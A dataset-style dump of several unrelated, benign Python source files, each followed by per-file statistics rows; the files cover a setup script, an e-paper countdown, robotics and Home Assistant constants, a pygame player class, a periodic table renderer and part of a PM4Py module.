author_email='mnowotka@ebi.ac.uk',
description='Python package generating compound co-occurance matrix for all assays from given document',
url='https://www.ebi.ac.uk/chembldb/index.php/ws',
license='CC BY-SA 3.0',
packages=['chembl_assay_network'],
long_description=open('README.rst').read(),
install_requires=[
'chembl-core-model>=0.8.3',
'numpy>=1.7.1',
'scipy',
],
include_package_data=True,
classifiers=['Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Topic :: Scientific/Engineering :: Chemistry'],
zip_safe=False,
) | 32.44186 | 108 | 0.614337 | 168 | 1,395 | 5 | 0.642857 | 0.011905 | 0.047619 | 0.059524 | 0.038095 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025739 | 0.248029 | 1,395 | 43 | 109 | 32.44186 | 0.775024 | 0.030108 | 0 | 0.055556 | 0 | 0 | 0.451923 | 0.034024 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.138889 | 0 | 0.138889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41402626baceb0ad14ef7bcb1114108515c7b502 | 2,029 | py | Python | waveshare/countdown.py | WebReflection/countdown | 7ba452de33bbef4c6132c4af0071fe28f6f3e3bb | [
"0BSD"
] | 6 | 2019-10-07T12:03:45.000Z | 2019-10-10T11:41:57.000Z | waveshare/countdown.py | WebReflection/countdown | 7ba452de33bbef4c6132c4af0071fe28f6f3e3bb | [
"0BSD"
] | null | null | null | waveshare/countdown.py | WebReflection/countdown | 7ba452de33bbef4c6132c4af0071fe28f6f3e3bb | [
"0BSD"
] | null | null | null | #!/usr/bin/env python3
# ISC License
#
# Copyright (c) 2019, Andrea Giammarchi, @WebReflection
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
import random
import os
import sys
sys.path.insert(1, os.path.realpath('./node_modules/filebus/python'))
# initialize the display
from waveshare_epd import epd2in13
epaper = epd2in13.EPD()
# they defined width and height upside down ^_^;;
width=epaper.height
height=epaper.width
# initialize the "canvas"
from PIL import Image, ImageFont, ImageDraw
# initialize the font
from font_fredoka_one import FredokaOne
font = ImageFont.truetype(FredokaOne, 42)
# initiate the FileBus channel
from filebus import FileBus
def ready(value = None):
print('ready')
epaper.init(epaper.lut_full_update)
epaper.Clear(0xFF)
epaper.init(epaper.lut_partial_update)
fb.send('ready', random.random())
def update(message = ''):
print('update: ' + message);
w, h = font.getsize(message)
x = (width - w) / 2
y = (height - h) / 2
img = Image.new("P", (width, height), 255)
draw = ImageDraw.Draw(img)
draw.text((x, y), message, font = font, fill = 0)
epaper.display(epaper.getbuffer(img.rotate(180)))
fb.send('update', random.random())
# use .js as channel input, and .python as channel output
fb = FileBus('.js', '.python')
fb.on('ready', ready)
fb.on('update', update)
# just wait for JS handshake
| 30.283582 | 79 | 0.73928 | 300 | 2,029 | 4.97 | 0.51 | 0.024145 | 0.021462 | 0.025486 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014035 | 0.15722 | 2,029 | 66 | 80 | 30.742424 | 0.857895 | 0.497782 | 0 | 0 | 0 | 0 | 0.075301 | 0.029116 | 0 | 0 | 0.004016 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.225806 | 0 | 0.290323 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
414211e54fff763958123b81d2506325421d7750 | 3,201 | py | Python | robotpose/constants.py | OSU-AIMS/RoPE-S3D | 0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5 | [
"Apache-2.0"
] | 1 | 2021-05-17T17:35:01.000Z | 2021-05-17T17:35:01.000Z | robotpose/constants.py | OSU-AIMS/RoPE-S3D | 0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5 | [
"Apache-2.0"
] | 1 | 2021-07-27T23:49:33.000Z | 2021-07-29T19:53:14.000Z | robotpose/constants.py | OSU-AIMS/RoPE-S3D | 0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5 | [
"Apache-2.0"
] | null | null | null | # Software License Agreement (Apache 2.0 License)
#
# Copyright (c) 2021, The Ohio State University
# Center for Design and Manufacturing Excellence (CDME)
# The Artificially Intelligent Manufacturing Systems Lab (AIMS)
# All rights reserved.
#
# Author: Adam Exley
import numpy as np
import logging as log
MAX_LINKS = 7
PATH_JSON_PATH = r'data/paths.json'
JSON_LINK_FILE = r"\\marvin\ROPE\joint_states.json"
##################################### Crops
CROP_RENDER_WEIGHTING = [6,3,3,0,1,0] # Higher numbers indicate more weight on that joint for rendering
CROP_VARYING = 'SLUB' # Joints to vary for crop calculation
CROP_MAX_PER_JOINT = 50 # Max poses for a single joint
CROP_SEC_ALLOTTED_APPROX = 20 # Approx number of seconds allowed for each crop rendering stage calculation
CROP_PADDING = 10
##################################### Lookups
GPU_MEMORY_ALLOWED_FOR_LOOKUP = 0.1 # Depending on hardware, this my vary. ~10% seems to work, but anything ~25%+ will overallocate for calculations
LOOKUP_NAME_LENGTH = 5
LOOKUP_MAX_DIV_PER_LINK = 200
LOOKUP_JOINTS = 'SLU' # SL is also usable
LOOKUP_NUM_RENDERED = 6 # 3 or 4 for SL
##################################### Segmentation Models
MODELDATA_FILE_NAME = 'ModelData.json'
NUM_MODELS_TO_KEEP = 3 # If a model has more than this number of stored checkpoints, they will be deleted.
MODEL_NAME_LENGTH = 4
##################################### Wizard Settings
WIZARD_DATASET_PREVIEW = True # Set to false to reduce lag caused by dataset previewing
##################################### Verifier
VERIFIER_ALPHA = .7 # Weight to place on images in verifier
VERIFIER_SELECTED_GAMMA = -50 # Amount to add to R/G/B Channels of a selected image. Usually negative.
VERIFIER_SCALER = 1.5 # Scale factor of thumbnails. Overall scale is this divided by THUMBNAIL_DS_FACTOR
VERIFIER_ROWS = 4 # Rows of images present in Verifier
VERIFIER_COLUMNS = 4 # Columns of images present in Verifier
##################################### Datasets
VIDEO_FPS = 15 # Default video frames per second
THUMBNAIL_DS_FACTOR = 6 # Factor to downscale images by for thumbnails. Larger numbers yield smaller images
DEFAULT_CAMERA_POSE = [0, -1.5, .75, 0, 0, 0] # Base camera pose to fill new datasets with before alignment
##################################### Rendering
def default_render_color_maker(num:int):
    """Creates unique colors for rendering.

    Each color is a [b, g, r] triplet: blue values are evenly spaced over
    0-255 (so every mesh gets a distinct blue), green is always 0, and red
    is |255 - 2b| to increase separation between neighboring colors.

    Parameters
    ----------
    num : int
        Number of colors to generate. Should be larger than the number of meshes expected to use.
        For 6-axis robots, the minimum recommended number is 7.

    Returns
    -------
    List[List]
        num pairs of RGB triplets
    """
    if num < 7:
        # log.warn is deprecated; warning() is the supported spelling
        log.warning('Fewer than 7 rendering colors are being generated. This may cause issues if a URDF with a 6+ axis robot is loaded.')

    b = np.linspace(0,255,num).astype(int) # Blue values are always unique
    g = [0] * b.size
    r = np.abs(255 - 2*b)

    colors = [[b[idx], g[idx], r[idx]] for idx in range(num)]
    return colors
DEFAULT_RENDER_COLORS = default_render_color_maker(7) # Increase if expecting to use more meshes/end effector | 34.793478 | 148 | 0.672602 | 460 | 3,201 | 4.552174 | 0.519565 | 0.015282 | 0.017192 | 0.016237 | 0.023878 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025573 | 0.181506 | 3,201 | 92 | 149 | 34.793478 | 0.773664 | 0.504842 | 0 | 0 | 0 | 0.026316 | 0.144338 | 0.024721 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.052632 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4148771c5460032b6e6cf71a733f1a7a81a72d62 | 2,893 | py | Python | custom_components/localtuya/const.py | JonathanFerraz/home-assistant | 15cd52f5eff850f978949406071fbe98b882918a | [
"MIT"
] | 18 | 2016-08-10T01:02:27.000Z | 2017-10-26T04:19:49.000Z | custom_components/localtuya/const.py | JonathanFerraz/home-assistant | 15cd52f5eff850f978949406071fbe98b882918a | [
"MIT"
] | null | null | null | custom_components/localtuya/const.py | JonathanFerraz/home-assistant | 15cd52f5eff850f978949406071fbe98b882918a | [
"MIT"
] | 4 | 2017-04-20T19:41:21.000Z | 2017-05-16T17:10:05.000Z | """Constants for localtuya integration."""
ATTR_CURRENT = "current"
ATTR_CURRENT_CONSUMPTION = "current_consumption"
ATTR_VOLTAGE = "voltage"
CONF_LOCAL_KEY = "local_key"
CONF_PROTOCOL_VERSION = "protocol_version"
CONF_DPS_STRINGS = "dps_strings"
CONF_PRODUCT_KEY = "product_key"
# light
CONF_BRIGHTNESS_LOWER = "brightness_lower"
CONF_BRIGHTNESS_UPPER = "brightness_upper"
CONF_COLOR = "color"
CONF_COLOR_MODE = "color_mode"
CONF_COLOR_TEMP_MIN_KELVIN = "color_temp_min_kelvin"
CONF_COLOR_TEMP_MAX_KELVIN = "color_temp_max_kelvin"
CONF_COLOR_TEMP_REVERSE = "color_temp_reverse"
CONF_MUSIC_MODE = "music_mode"
# switch
CONF_CURRENT = "current"
CONF_CURRENT_CONSUMPTION = "current_consumption"
CONF_VOLTAGE = "voltage"
# cover
CONF_COMMANDS_SET = "commands_set"
CONF_POSITIONING_MODE = "positioning_mode"
CONF_CURRENT_POSITION_DP = "current_position_dp"
CONF_SET_POSITION_DP = "set_position_dp"
CONF_POSITION_INVERTED = "position_inverted"
CONF_SPAN_TIME = "span_time"
# fan
CONF_FAN_SPEED_CONTROL = "fan_speed_control"
CONF_FAN_OSCILLATING_CONTROL = "fan_oscillating_control"
CONF_FAN_SPEED_MIN = "fan_speed_min"
CONF_FAN_SPEED_MAX = "fan_speed_max"
CONF_FAN_ORDERED_LIST = "fan_speed_ordered_list"
CONF_FAN_DIRECTION = "fan_direction"
CONF_FAN_DIRECTION_FWD = "fan_direction_forward"
CONF_FAN_DIRECTION_REV = "fan_direction_reverse"
# sensor
CONF_SCALING = "scaling"
# climate
CONF_TARGET_TEMPERATURE_DP = "target_temperature_dp"
CONF_CURRENT_TEMPERATURE_DP = "current_temperature_dp"
CONF_TEMPERATURE_STEP = "temperature_step"
CONF_MAX_TEMP_DP = "max_temperature_dp"
CONF_MIN_TEMP_DP = "min_temperature_dp"
CONF_PRECISION = "precision"
CONF_TARGET_PRECISION = "target_precision"
CONF_HVAC_MODE_DP = "hvac_mode_dp"
CONF_HVAC_MODE_SET = "hvac_mode_set"
CONF_PRESET_DP = "preset_dp"
CONF_PRESET_SET = "preset_set"
CONF_HEURISTIC_ACTION = "heuristic_action"
CONF_HVAC_ACTION_DP = "hvac_action_dp"
CONF_HVAC_ACTION_SET = "hvac_action_set"
CONF_ECO_DP = "eco_dp"
CONF_ECO_VALUE = "eco_value"
# vacuum
CONF_POWERGO_DP = "powergo_dp"
CONF_IDLE_STATUS_VALUE = "idle_status_value"
CONF_RETURNING_STATUS_VALUE = "returning_status_value"
CONF_DOCKED_STATUS_VALUE = "docked_status_value"
CONF_BATTERY_DP = "battery_dp"
CONF_MODE_DP = "mode_dp"
CONF_MODES = "modes"
CONF_FAN_SPEED_DP = "fan_speed_dp"
CONF_FAN_SPEEDS = "fan_speeds"
CONF_CLEAN_TIME_DP = "clean_time_dp"
CONF_CLEAN_AREA_DP = "clean_area_dp"
CONF_CLEAN_RECORD_DP = "clean_record_dp"
CONF_LOCATE_DP = "locate_dp"
CONF_FAULT_DP = "fault_dp"
CONF_PAUSED_STATE = "paused_state"
CONF_RETURN_MODE = "return_mode"
CONF_STOP_STATUS = "stop_status"
DATA_DISCOVERY = "discovery"
DOMAIN = "localtuya"
# Platforms in this list must support config flows
PLATFORMS = [
"binary_sensor",
"climate",
"cover",
"fan",
"light",
"number",
"select",
"sensor",
"switch",
"vacuum",
]
TUYA_DEVICE = "tuya_device"
| 27.817308 | 56 | 0.807812 | 413 | 2,893 | 5.065375 | 0.227603 | 0.054493 | 0.022945 | 0.034417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104044 | 2,893 | 103 | 57 | 28.087379 | 0.807099 | 0.045282 | 0 | 0 | 0 | 0 | 0.359403 | 0.070571 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
414999092001be652ff829a08dad85777592db23 | 8,098 | py | Python | source/player.py | 2nPlusOne/pygame-platformer | 69078819280506d8ab1af4c493da22eb02b4fe01 | [
"MIT"
] | null | null | null | source/player.py | 2nPlusOne/pygame-platformer | 69078819280506d8ab1af4c493da22eb02b4fe01 | [
"MIT"
] | null | null | null | source/player.py | 2nPlusOne/pygame-platformer | 69078819280506d8ab1af4c493da22eb02b4fe01 | [
"MIT"
] | null | null | null | import pygame
from settings import *
import utils
class Player(pygame.sprite.Sprite):
def __init__(self, pos, groups, collision_sprites):
super().__init__(groups)
self.image = pygame.Surface((TILE_SIZE / 2, TILE_SIZE))
self.image.fill(PLAYER_COLOR)
self.rect = self.image.get_rect(topleft=pos)
self.collision_sprites = collision_sprites
# Player movement
self.direction_x = 0 # -1 = left, 1 = right, 0 = none
self.velocity = pygame.math.Vector2()
self.speed = MAX_PLAYER_SPEED
# Jumping
self.jumps_remaining = MAX_JUMPS
self.is_grounded = False # Is the player on the ground?
self.was_grounded = False # Used to determine if the player has left the ground this frame
self.is_jumping = False # Is the player jumping?
self.jump_pressed = False # Is the jump key currently pressed?
self.jumping_locked = False # Used to lock the player from jumping again until they release the jump key
self.current_gravity = 0 # The current gravity affecting the player
self.jump_gravity = (2 * MAX_JUMP_HEIGHT) / (TIME_TO_JUMP_APEX ** 2)
self.fall_gravity = self.jump_gravity * FALL_GRAVITY_MULTIPLIER
self.jump_velocity = ((-2 * MAX_JUMP_HEIGHT) / TIME_TO_JUMP_APEX) - self.fall_gravity
# Time
self.coyote_timer = COYOTE_TIME # Time the player has to jump after leaving the ground
self.jump_buffer_timer = JUMP_BUFFER_TIME # Registers jump input as long as this is less than JUMP_BUFFER_TIME
self.last_frame_ticks = 0 # Not used if using estimated delta_time (1/FPS)
def process_input(self, events):
"""Process input events. This method is called by Level, which passes in the events from the main game loop."""
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT: # Move left
self.direction_x = -1
if event.key == pygame.K_RIGHT: # Move right
self.direction_x = 1
if event.key == pygame.K_UP: # Jump
self.jump_pressed = True
if event.key == pygame.K_g: # Invert gravity just for fun
self.fall_gravity = -self.fall_gravity
self.current_gravity = -self.current_gravity
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT and self.direction_x < 0:
self.direction_x = 0
if event.key == pygame.K_RIGHT and self.direction_x > 0:
self.direction_x = 0
if event.key == pygame.K_UP:
self.jump_pressed = False
self.jumping_locked = False
def check_jump_buffer(self):
"""Conditionally applies jumping force to the player."""
self.update_jump_buffer_timer()
# jump_allowed = not (self.jumps_remaining > 0 and
# (self.is_grounded or self.is_jumping or
# self.coyote_timer < COYOTE_TIME))
jump_input = self.jump_buffer_timer < JUMP_BUFFER_TIME
can_jump = not self.jumping_locked and self.jumps_remaining > 0 and (
self.is_jumping or self.coyote_timer < COYOTE_TIME)
self.jumping_locked = self.jump_pressed
if jump_input and can_jump:
self.jump()
def jump(self):
self.coyote_timer = COYOTE_TIME
self.jump_buffer_timer = JUMP_BUFFER_TIME
self.is_jumping = True
self.jumps_remaining -= 1
self.current_gravity = self.jump_gravity
self.velocity.y = self.jump_velocity
def update_air_timer(self):
"""Resets air timer if grounded, otherwise increments by delta time."""
self.coyote_timer = 0 if self.is_grounded else round(self.coyote_timer + EST_DELTA_TIME, 2)
def update_jump_buffer_timer(self):
"""Resets jump buffer timer if jump key pressed, otherwise increments by delta time."""
self.jump_buffer_timer = 0 if self.jump_pressed and not self.jumping_locked else round(self.jump_buffer_timer + EST_DELTA_TIME, 2)
def move(self):
"""Move the player and apply collisions."""
self.velocity.y += self.current_gravity
self.check_jump_buffer() # Check if the player should jump this frame
target_velocity = pygame.math.Vector2(self.direction_x * self.speed, self.velocity.y)
self.velocity = utils.pygame_vector2_smooth_damp(self.velocity, target_velocity, SMOOTH_TIME, EST_DELTA_TIME)
self.velocity.x = 0 if abs(self.velocity.x) < 2*SMOOTH_TIME else self.velocity.x
# Horizontal movement and collisions
self.rect.x += self.velocity.x
for sprite in self.collision_sprites.sprites():
if not sprite.rect.colliderect(self.rect): continue
# Right collision
elif abs(self.rect.right - sprite.rect.left) < COLLISION_TOLERANCE and self.velocity.x > 0:
self.rect.right = sprite.rect.left
# Left collision
elif abs(self.rect.left - sprite.rect.right) < COLLISION_TOLERANCE and self.velocity.x < 0:
self.rect.left = sprite.rect.right
self.velocity.x = 0
break
# Vertical movement and collisions
# Since vertical movement can be potentially a lot faster than horizontal due to gravity,
# we need to check for collisions as we go each frame, instead of after moving by the velocity.
for i in range(abs(int(self.velocity.y))):
collided = False
self.rect.y += abs(self.velocity.y) / self.velocity.y
for sprite in self.collision_sprites.sprites():
if not sprite.rect.colliderect(self.rect): continue
# Bottom collision
elif abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE and self.velocity.y > 0:
self.rect.bottom = sprite.rect.top
# Top collision
elif abs(self.rect.top - sprite.rect.bottom) < COLLISION_TOLERANCE and self.velocity.y < 0:
self.rect.top = sprite.rect.bottom
self.velocity.y = 0
collided = True
break
if collided: break
# Set gravity to fall gravity scale if we're falling or not holding jump
if (not self.is_grounded and (not self.jump_pressed or self.velocity.y > 0)):
self.current_gravity = self.fall_gravity
def set_grounded(self):
"""Moves the player down 1 pixel and checks for a collision."""
self.rect.y += 1
for sprite in self.collision_sprites.sprites():
if sprite.rect.colliderect(self.rect):
if not abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE: continue
self.is_grounded = True
self.was_grounded = True
self.is_jumping = False
self.jumps_remaining = MAX_JUMPS
break
else:
self.is_grounded = False
left_ground_this_frame = self.was_grounded and not self.is_grounded
if not left_ground_this_frame: continue
self.air_time_start = pygame.time.get_ticks()
self.was_grounded = False
self.rect.y -= 1
def update(self):
"""Update the player."""
self.update_air_timer()
self.move()
self.set_grounded()
print(f"jumps_remaining: {self.jumps_remaining}")
print(f"jump_locked: {self.jumping_locked}")
# Zombie method, only used if I decide I need perfect delta time (should probably remove this...)
def update_delta_time(self):
"""Update the delta time."""
self.delta_time = (pygame.time.get_ticks() - self.last_frame_ticks) / 1000
self.last_frame_ticks = pygame.time.get_ticks() | 48.491018 | 138 | 0.618177 | 1,053 | 8,098 | 4.573599 | 0.177588 | 0.049834 | 0.026993 | 0.023256 | 0.336379 | 0.259759 | 0.186669 | 0.155731 | 0.135797 | 0.053987 | 0 | 0.007611 | 0.302297 | 8,098 | 167 | 139 | 48.491018 | 0.844779 | 0.206594 | 0 | 0.239669 | 0 | 0 | 0.011487 | 0.006766 | 0 | 0 | 0 | 0 | 0 | 1 | 0.082645 | false | 0 | 0.024793 | 0 | 0.115702 | 0.016529 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4149b0929f392e8e110537d2266f990d4929d8f0 | 5,054 | py | Python | periodic/table.py | moopet/pyriodic | 5477934881db6a00f040b9ff3624d1eca9389f36 | [
"MIT"
] | null | null | null | periodic/table.py | moopet/pyriodic | 5477934881db6a00f040b9ff3624d1eca9389f36 | [
"MIT"
] | null | null | null | periodic/table.py | moopet/pyriodic | 5477934881db6a00f040b9ff3624d1eca9389f36 | [
"MIT"
] | null | null | null | from colored import fg, bg, attr
from . import elements
from . import layouts
class PeriodicTableError(Exception):
    """Raised for errors specific to the periodic table."""
class PeriodicTable:
"""Periodic Table."""
def __init__(self, **kwargs):
    """Build a table, honoring optional 'color' and 'width' settings."""
    self.color = kwargs.get("color", False)
    self.width = kwargs.get("width")
    self.elements = elements.elements
    self.layouts = layouts.layouts
def colorize_symbol(self, symbol, show_number=False):
"""Get a pretty version of a symbol or number."""
if symbol == " ":
return " "
symbol = symbol.lower().capitalize()
text = f" {symbol:2} "
if show_number:
number = str(self.elements[symbol]["number"])
text = f" {number:3}"
if self.color:
element_color = self.elements[symbol]["color"]
contrast_color = "white"
if element_color == "yellow":
contrast_color = "yellow_1"
background_color = bg(element_color)
text_color = fg(contrast_color) if show_number else fg("black")
reset = attr("reset")
text = f"{background_color}{text_color}{text}{reset}"
return text
def render_info(self, symbol):
"""Print summary information for a particular element."""
if symbol not in self.elements:
raise PeriodicTableError(f"Symbol not found in the periodic table")
if self.color:
self.render_symbols([symbol])
element = self.elements[symbol]
print(f"Symbol: {symbol}")
print(f"Name: {element['name']}")
if "origin" in element:
print(f"Origin of name: {element['origin']}")
print(f"Series: {element['series'].capitalize()}")
print(f"Atomic number: {element['number']}")
print(f"Period: {element['period']}")
if "group" in element:
print(f"Group: {element['group']}")
def render_table(self, layout="standard", show_grid=False):
"""Print the classic periodic table using current output
configuration."""
if layout not in self.layouts:
raise PeriodicTableError(f"Unknown table layout '{layout}'")
if show_grid:
print(" " + self.layouts[layout]["grid"])
print()
period = 1
for line in self.layouts[layout]["table"].splitlines():
line = f" {line} "
is_top_line = period == int(period)
period += 0.5
for symbol in self.elements:
replacement = self.colorize_symbol(symbol, is_top_line)
line = line.replace(f" {symbol:2} ", replacement)
if show_grid:
header = int(period) if period < 8 and is_top_line else ' '
line = f"{header} {line}"
if self.color:
reset = attr('reset')
for symbol in self.elements:
color = bg(self.elements[symbol]["color"])
pattern = f" {symbol:2} "
line = line.replace(pattern, f"{color}{pattern}{reset}")
print(line)
def render_symbols(self, symbols):
"""Print a list of symbols using current output configuration."""
columns = int(self.width / 4)
lines = [symbols[i:i + columns] for i in range(0, len(symbols), columns)]
for line in lines:
top = [self.colorize_symbol(symbol, show_number=True) for symbol in line]
bottom = [self.colorize_symbol(symbol) for symbol in line]
print("".join(top))
print("".join(bottom))
def get_solutions(self, word, recursing=False):
"""Find all permutations that can spell a word."""
if not recursing:
self.stack = []
self.results = []
word = word.lower()
for symbol in self.elements:
symbol = symbol.lower()
if symbol == word:
if self.stack not in self.results:
self.stack.append(symbol)
self.results.append(self.stack)
self.stack = self.stack[:-1]
continue
if symbol == word[:len(symbol)]:
self.stack.append(symbol)
self.get_solutions(word[len(symbol):], recursing=True)
self.stack = self.stack[:-1]
return sorted(self.results, key=self.get_solution_ranking)
def get_solution_ranking(self, solution):
"""Score a solution based on length and number of repeated symbols."""
return len(solution) + 100 * (len(solution) - len(set(solution)))
def get_symbol_from_atomic_number(self, number):
"""Translate an atomic number into an element's symbol."""
number = int(number)
elements = self.elements
matches = [e for e in elements if elements[e]["number"] == number]
return matches[0] if matches else None
| 30.630303 | 85 | 0.564899 | 580 | 5,054 | 4.843103 | 0.22931 | 0.04272 | 0.03204 | 0.01602 | 0.055892 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004928 | 0.317372 | 5,054 | 164 | 86 | 30.817073 | 0.809275 | 0.085081 | 0 | 0.118812 | 0 | 0 | 0.113786 | 0.021444 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079208 | false | 0.009901 | 0.029703 | 0 | 0.178218 | 0.118812 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4149c18516a466d5bd042367b350b07706f720b8 | 536 | py | Python | data_model/transaction.py | chryoung/beancount_importer | 664d4bf07d7b953afca4cf9fce7436c942390c52 | [
"MIT"
] | 2 | 2021-08-18T14:05:46.000Z | 2021-09-24T07:44:23.000Z | data_model/transaction.py | chryoung/beancount_importer | 664d4bf07d7b953afca4cf9fce7436c942390c52 | [
"MIT"
] | 1 | 2021-09-24T08:00:26.000Z | 2021-10-07T10:45:28.000Z | data_model/transaction.py | chryoung/beancount_importer | 664d4bf07d7b953afca4cf9fce7436c942390c52 | [
"MIT"
] | null | null | null | from datetime import date
from enum import IntEnum
class TransactionDirection(IntEnum):
    """Direction of a transaction: expenses (0) or income (1)."""
    EXPENSES = 0
    INCOME = 1
class Transaction:
    """Mutable record of a single transaction to (optionally) import."""

    def __init__(self):
        # Import/editing state flags.
        self.will_import = True
        self.is_modified = False

        # Core transaction details.
        self.transaction_date = date.today()
        self.payee = ''
        self.description = ''
        self.amount = 0
        self.currency = ''

        # Account routing.
        self.bill_payment_account = ''
        self.direction = TransactionDirection.EXPENSES
        self.from_account = ''
        self.to_account = ''
| 23.304348 | 54 | 0.619403 | 56 | 536 | 5.732143 | 0.553571 | 0.102804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007916 | 0.29291 | 536 | 22 | 55 | 24.363636 | 0.83905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.166667 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
414dbeebee592b4e49d79aec901a1680c586b5fb | 3,617 | py | Python | ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-19T04:02:46.000Z | 2022-01-19T04:02:46.000Z | ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2021-11-19T07:21:48.000Z | 2021-11-19T07:21:48.000Z | ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-14T17:15:38.000Z | 2022-01-14T17:15:38.000Z | '''
This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de).
PM4Py is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PM4Py is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PM4Py. If not, see <https://www.gnu.org/licenses/>.
'''
from enum import Enum
from pm4py.algo.discovery.dfg.adapters.pandas.df_statistics import get_concurrent_events_dataframe
from pm4py.util import exec_utils, constants, xes_constants
from typing import Optional, Dict, Any, Union, Tuple, List, Set
import pandas as pd
class Parameters(Enum):
    """Parameter keys accepted by :func:`apply`."""
    ACTIVITY_KEY = constants.PARAMETER_CONSTANT_ACTIVITY_KEY
    CASE_ID_KEY = constants.PARAMETER_CONSTANT_CASEID_KEY
    TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_TIMESTAMP_KEY
    START_TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_START_TIMESTAMP_KEY
    # When True, only strictly overlapping intervals (intersection length > 0)
    # count as concurrent.
    STRICT = "strict"
def apply(dataframe: pd.DataFrame, parameters: Optional[Dict[Union[str, Parameters], Any]] = None) -> Dict[Tuple[str, str], int]:
    """
    Gets the number of times for which two activities have been concurrent in the log

    Parameters
    --------------
    dataframe
        Pandas dataframe
    parameters
